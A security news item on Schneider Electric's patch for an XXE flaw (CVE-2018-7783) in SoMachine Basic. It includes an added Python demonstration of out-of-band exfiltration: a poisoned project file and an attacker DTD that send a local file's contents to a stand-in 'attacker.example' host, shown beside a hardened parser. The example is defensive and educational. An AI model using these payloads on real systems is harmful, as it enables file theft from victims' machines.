
Schneider Electric patches XML External Entity vulnerability


Schneider Electric has patched a vulnerability (CVE-2018-7783) in its SoMachine Basic programming software that lets an attacker disclose and retrieve arbitrary data from the affected host through an out-of-band attack.

The vulnerability is classified as an out-of-band remote arbitrary data retrieval issue and affects all versions of SoMachine Basic prior to v1.6 SP1.

“SoMachine Basic suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack. The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML project/template file,” the company said in a security alert.
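The two-stage technique the advisory describes, as an added example that is not SoMachine Basic code or Schneider's: the advisory does not say which XML library the product uses, so the attack is replayed against Python's expat binding (xml.parsers.expat). The attacker host, the file path and the secret are constructed for the demonstration and are answered from memory, so nothing leaves the machine. The weak parser configuration and a hardened one are shown side by side over the same poisoned project file.

```python
"""Out-of-band XXE through DTD parameter entities, reproduced against an expat
parser (Python's xml.parsers.expat).  Added example, not SoMachine Basic code."""
import xml.parsers.expat as expat

# Constructed fixtures: a file on the victim's workstation and a host the
# attacker controls.  Nothing here touches the real disk or network.
SECRET_URL = "file:///C:/ProgramData/demo/secret.txt"
SECRET_CONTENT = b"SC-4711-SECRET"      # single line, no XML metacharacters
ATTACKER = "http://attacker.example"

# Stage 2, served from the attacker's host.  A parameter-entity reference inside
# an entity value is legal only in the external subset, so this part cannot sit
# in the project file itself.  &#x25; becomes a literal '%' when the value is
# stored: %eval; then declares %exfil, whose system ID carries %file;'s contents.
EVIL_DTD = (
    "<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM '{host}/collect?%file;'>\">\n"
    "%eval;\n"
    "%exfil;\n"
).format(host=ATTACKER).encode()

# Stage 1: the poisoned project/template file.  %dtd; is a parameter-entity
# reference between declarations, which the internal subset permits.
MALICIOUS_PROJECT = (
    '<?xml version="1.0"?>\n'
    "<!DOCTYPE project [\n"
    '  <!ENTITY % file SYSTEM "{secret}">\n'
    '  <!ENTITY % dtd SYSTEM "{host}/evil.dtd">\n'
    "  %dtd;\n"
    "]>\n"
    "<project><name>Pump station 3</name></project>\n"
).format(secret=SECRET_URL, host=ATTACKER).encode()

class Resolver:
    """Stands in for a resolver that dereferences whatever URL a DTD names.
    Every request is logged, so the out-of-band leak is visible without a
    real listener; file: and http: URLs are answered from the fixtures."""

    def __init__(self):
        self.requests = []

    def fetch(self, url):
        self.requests.append(url)
        if url == SECRET_URL:
            return SECRET_CONTENT
        if url == ATTACKER + "/evil.dtd":
            return EVIL_DTD
        return b""          # /collect?...: the attacker only needs the URL

def _follow_external_entities(parser, resolver):
    """Install a fetch-anything external-entity handler.  Each child parser
    gets its own closure: the %file; reference inside EVIL_DTD has to be
    expanded by a parser created from the child that is reading the DTD."""
    def on_external_entity(context, base, system_id, public_id):
        child = parser.ExternalEntityParserCreate(context)
        _follow_external_entities(child, resolver)
        child.Parse(resolver.fetch(system_id), True)
        return 1
    parser.ExternalEntityRefHandler = on_external_entity

def parse_vulnerable(xml_bytes, resolver):
    """Weak configuration: parameter entities expanded and external references
    followed.  Returns the element names seen."""
    names = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
    _follow_external_entities(parser, resolver)
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(xml_bytes, True)
    return names

def parse_hardened(xml_bytes, allow_doctype=False):
    """Hardened configuration: no external-entity handler, parameter-entity
    parsing left at expat's default (never) and, unless allow_doctype is set,
    any DOCTYPE rejected because a project file has no business carrying one."""
    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError("DOCTYPE not allowed in project files")
    names = []
    parser = expat.ParserCreate()
    if not allow_doctype:
        parser.StartDoctypeDeclHandler = reject_doctype
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(xml_bytes, True)
    return names

def demo():
    """Run both configurations over the same poisoned file and report."""
    resolver = Resolver()
    elements = parse_vulnerable(MALICIOUS_PROJECT, resolver)
    try:
        parse_hardened(MALICIOUS_PROJECT)
        verdict = "accepted"
    except ValueError as exc:
        verdict = "rejected: " + str(exc)
    return {
        "elements": elements,
        "requests": resolver.requests,
        "leaked": any(SECRET_CONTENT.decode() in u for u in resolver.requests),
        "hardened": verdict,
        "expat_default": parse_hardened(MALICIOUS_PROJECT, allow_doctype=True),
    }
```

Calling demo() returns the element names the vulnerable parser still produced, the three requests it made in order (the attacker's DTD, the local file, then the collect URL with the file's contents appended) and the hardened verdict. Two points matter in practice. First, expat fetches nothing on its own: the leak happens only because the application installs an external-entity handler and switches parameter-entity parsing on, which is why the hardened parser, even when told to tolerate the DOCTYPE, opens the same file without making a single request. Second, the exfiltration needs no entity reference in the document body and produces no error, so on the victim's side a successful attack looks like a project that opened normally; the only observable is the outbound request. The equivalent switches elsewhere are DtdProcessing.Prohibit with a null XmlResolver in .NET, and for libxml2-based parsers leaving XML_PARSE_NOENT and XML_PARSE_DTDLOAD unset and adding XML_PARSE_NONET.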

The fix ships in SoMachine Basic v1.6 SP1. The flaw was discovered by Gjoko Krstikj of Applied Risk.
